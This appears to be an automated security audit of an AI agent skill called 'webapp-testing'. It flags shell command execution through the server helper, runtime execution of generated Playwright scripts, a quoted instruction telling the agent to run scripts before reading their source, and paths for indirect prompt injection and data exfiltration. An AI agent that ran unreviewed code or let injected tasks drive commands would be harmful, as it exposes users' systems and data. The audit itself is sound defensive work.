webapp-testing

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill provides a framework for executing arbitrary shell commands via the scripts/with_server.py helper. Specifically, the --server argument accepts strings that are likely executed via a shell (e.g., "npm run dev", "cd backend && python server.py"), enabling an attacker to run arbitrary commands if the user task is manipulated.
  • [REMOTE_CODE_EXECUTION] (HIGH): The skill instructs the agent to write and execute native Python Playwright scripts at runtime based on user-provided tasks. Executing generated code based on untrusted input is a classic RCE vector.
  • [PROMPT_INJECTION] (MEDIUM): The skill contains a deceptive instruction: "DO NOT read the source until you try running the script first". This is a 'black box' technique intended to bypass the agent's safety reasoning or inspection of executable code before runtime, effectively overriding standard safety protocols.
  • [DATA_EXFILTRATION] (LOW): Playwright scripts have the capability to read local files (via file:// protocols) and perform network requests. When coupled with the ability to generate scripts from untrusted user input, this creates a data exfiltration path.
  • [INDIRECT_PROMPT_INJECTION] (LOW): The skill has a significant attack surface as it ingests 'User tasks' and interpolates them into command-line arguments and script logic.
  • Ingestion points: User tasks (SKILL.md decision tree).
  • Boundary markers: Absent; there are no delimiters or instructions to ignore instructions within the processed data.
  • Capability inventory: Subprocess execution (via with_server.py), file system access, and network operations (via Playwright).
  • Sanitization: Absent; the skill does not suggest any validation or escaping of the user input before it is used in executable contexts.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:17 PM